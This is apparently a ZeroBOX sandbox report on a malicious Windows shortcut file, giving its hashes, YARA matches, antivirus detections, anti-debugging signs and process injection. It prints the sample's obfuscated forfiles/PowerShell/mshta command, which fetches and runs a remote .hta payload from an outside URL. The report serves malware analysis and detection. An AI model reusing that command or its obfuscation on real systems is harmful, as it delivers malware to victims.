Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
11.11 10:11
bxn.exe
11.11 10:11
glued.hta
11.11 10:11
MONDAYconstraints.vbs
11.11 10:11
tartarises.vbs
11.11 10:11
xwo.exe
11.11 10:11
comehomeconstraints.vbs
11.11 10:11
hello.exe
11.11 10:11
chrome_130.exe
11.11 10:11
s.exe
11.11 10:11
Citatfusk.vbe

Latest News
11.13 01:11
Prosus Gains $2 Billio...
11.13 01:11
Bei diesem neuen Mathe...
11.13 12:11
안랩, 디지털포렌식 챌린지 2024에서 ...
11.13 12:11
The End of Ondsel and ...
11.13 12:11
쥬노, 디저트 브랜드 '카삭산도' 팝업스...
11.13 11:11
Security Alert: Micros...
11.13 11:11
Security Alert: Micros...
11.13 11:11
매크론-더픽트, 조선·해양·방산 분야 디...
11.13 11:11
페이퍼어스, 디자인코리아 2024 참여
11.13 11:11
ISC Stormcast For Wedn...

Summary | ZeroBOX

client_upd.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 8, 2023, 4:09 p.m.	Sept. 8, 2023, 4:11 p.m.

Size	2.0KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=79, Archive, ctime=Sat Dec 7 00:09:57 2019, mtime=Sat Sep 2 07:33:26 2023, atime=Sat Dec 7 00:09:57 2019, length=41472, window=hidenormalshowminimized
MD5	`b67e9a5be90034b0814412603f5ba09e`
SHA256	`82a78bf48a26c07f60ae2cc035992894bf8584e28c881c32b19ce620fa10c8fa`
CRC32	`94D6F319`
ssdeep	`24:8XoEMu4JPpyA1k8WfyMUIsyMb+UHKb+/4Y5ws4flBsaW/ab/2XTfm:8X/Mum7IYgLflBsnab2jf`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "lqHVbMaXL" C:\Users\test22\AppData\Local\Temp\client_upd.lnk
3024
- forfiles.exe "C:\Windows\System32\forfiles.exe" /p \Windows\SKB /c "powershell . \*i*\S*3*\m*ta.e* https://embutidoskami.sdb.bo/wp-content/uploads/2015/06/HDDREQ.hta
  2208

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 8, 2023, 4:09 p.m.	buffer: ERROR: The specified directory does not exist. console_handle: 0x0000000b	1	1	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\client_upd.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\forfiles.exe" /p \Windows\SKB /c "powershell . \*i*\S*3*\m*ta.e* https://embutidoskami.sdb.bo/wp-content/uploads/2015/06/HDDREQ.hta

File has been identified by 5 AntiVirus engines on VirusTotal as malicious (5 events)

Symantec	CL.Downloader!gen111
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
Sophos	Troj/LnkObf-W
ZoneAlarm	HEUR:Trojan-Downloader.WinLNK.Powedon.gen
Google	Detected

Yara rule detected in process memory (8 events)

description	(no description)				rule	DebuggerCheck__GlobalFlags
description	(no description)				rule	DebuggerCheck__QueryInfo
description	(no description)				rule	DebuggerHiding__Thread
description	(no description)				rule	DebuggerHiding__Active
description	(no description)				rule	ThreadControl__Context
description	(no description)				rule	SEH__vectored
description	Checks if being debugged				rule	anti_dbg
description	Bypass DEP				rule	disable_dep

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3024 resumed a thread in remote process 2208
NtResumeThread Sept. 8, 2023, 4:09 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2208	1	0	0